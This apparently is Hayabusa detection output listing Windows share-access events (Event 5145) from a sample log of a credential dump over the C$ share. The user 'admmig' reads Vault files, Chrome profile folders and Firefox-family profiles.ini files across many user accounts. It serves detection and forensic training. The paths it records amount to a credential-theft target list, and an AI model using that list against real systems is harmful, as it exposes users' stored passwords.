+2021-12-12 20:53:15.577 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.593 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.593 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.624 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.624 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.640 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.720 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.720 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.720 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.736 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.751 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.751 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.798 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.798 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.798 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.831 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.831 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.831 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.846 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.846 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.846 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.862 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.862 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
